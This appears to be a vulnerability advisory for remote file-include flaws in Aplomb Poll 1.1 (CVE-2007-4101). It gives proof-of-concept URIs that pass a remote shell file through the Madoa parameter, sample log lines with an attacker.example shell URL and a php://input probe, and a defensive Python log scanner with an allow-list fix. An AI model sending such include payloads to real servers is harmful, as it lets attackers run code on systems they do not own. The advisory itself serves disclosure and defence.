Aplomb Poll Madoa Parameter Multiple Remote File Include Vulnerabilities
BID:25138
Info
| Bugtraq ID: | 25138 |
| Class: | Input Validation Error |
| CVE: | CVE-2007-4101 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 30 2007 12:00AM |
| Updated: | May 07 2015 05:36PM |
| Credit: | ilker kandemir is credited with the discovery of these vulnerabilities. |
| Vulnerable: | Global Centre Aplomb Poll 1.1 |
| Not Vulnerable: | |
Discussion
Aplomb Poll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Aplomb Poll 1.1 is vulnerable; other versions may also be affected.
Exploit / POC
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?Madoa=http://sheel.txt?
http://www.example.com/vote.php?Madoa=http://sheel.txt?
http://www.example.com/admin.php?Madoa=http://shell.txt?
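The discussion above describes the mechanism (an include path built from a user-supplied parameter that may be a URL), and the proof-of-concept URIs show what the probe looks like on the wire. As an added example, not code from the advisory's author or from Aplomb Poll, the following Python script does two defender-side things with that information: it scans access-log lines for query-string values that are themselves a remote URL or a PHP stream wrapper (generalizing beyond the Madoa parameter to any parameter name and to percent-encoded variants), and it shows the allow-list lookup that replaces an include() assembled from a raw parameter. The log lines, the host names, the `id` parameter and the allow-list of include names are constructed assumptions.

```python
"""Flag remote-file-include (RFI) probes in web server access logs.

Added example for this advisory; it is not code from Aplomb Poll or from
the advisory's author. It assumes Common Log Format input and a
hypothetical allow-list of include names; the log lines are constructed.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Prefixes that mark a request-supplied include target as remote or as a
# PHP stream wrapper; an include path built from a parameter should never
# start with any of them.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "ftps://",
                   "php://", "data:", "expect://")

# Common Log Format: client ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines: an RFI probe shaped like the PoC URIs, a
# percent-encoded variant, a benign request, and a php:// wrapper probe.
LOG_LINES = [
    '203.0.113.5 - - [30/Jul/2007:10:15:02 +0000] '
    '"GET /index.php?Madoa=http://sheel.txt? HTTP/1.0" 200 512',
    '198.51.100.7 - - [30/Jul/2007:10:15:09 +0000] '
    '"GET /vote.php?Madoa=%68ttp://attacker.example/shell.txt%3F HTTP/1.1" 200 77',
    '192.0.2.44 - - [30/Jul/2007:10:16:30 +0000] '
    '"GET /vote.php?Madoa=en&id=3 HTTP/1.1" 200 1440',
    '192.0.2.44 - - [30/Jul/2007:10:17:01 +0000] '
    '"GET /admin.php?Madoa=php://input HTTP/1.1" 200 77',
]


def rfi_params(path):
    """Return (name, value) pairs from the query string whose value looks
    like a remote file or stream wrapper, regardless of the parameter name."""
    hits = []
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        # parse_qsl already decodes once; decode again to catch double encoding.
        decoded = unquote(value).strip().lower()
        if decoded.startswith(REMOTE_PREFIXES):
            hits.append((name, value))
    return hits


def scan_log(lines):
    """Parse each log line and keep the requests carrying an RFI-shaped parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not Common Log Format; skip rather than guess
        hits = rfi_params(m.group("path"))
        if hits:
            findings.append({"ip": m.group("ip"), "path": m.group("path"),
                             "status": int(m.group("status")), "params": hits})
    return findings


# Hypothetical allow-list: the only include names the script would accept.
ALLOWED_INCLUDES = {"en", "tr"}


def resolve_include(value, allowed=ALLOWED_INCLUDES, base="lang"):
    """Fix pattern for include()-from-parameter: map the parameter to a
    known local file through an allow-list, never by concatenating the raw
    value into the path. Returns None for anything not on the list."""
    if value not in allowed:
        return None
    return f"{base}/{value}.php"


if __name__ == "__main__":
    for f in scan_log(LOG_LINES):
        names = ", ".join(f"{n}={v}" for n, v in f["params"])
        print(f"{f['ip']} {f['path']} status={f['status']} RFI-shaped: {names}")
```

Run it as-is to see the three probe lines reported and the benign `Madoa=en&id=3` request ignored. The detection keys on the shape of the value rather than on the name `Madoa`, because the same include pattern in another script would use another parameter; the `resolve_include` lookup is the corresponding fix pattern when no vendor patch exists: the request chooses among known local files, and the raw value never reaches `include()`.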
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
References:
- Aplomb Poll Home Page (Global Centre)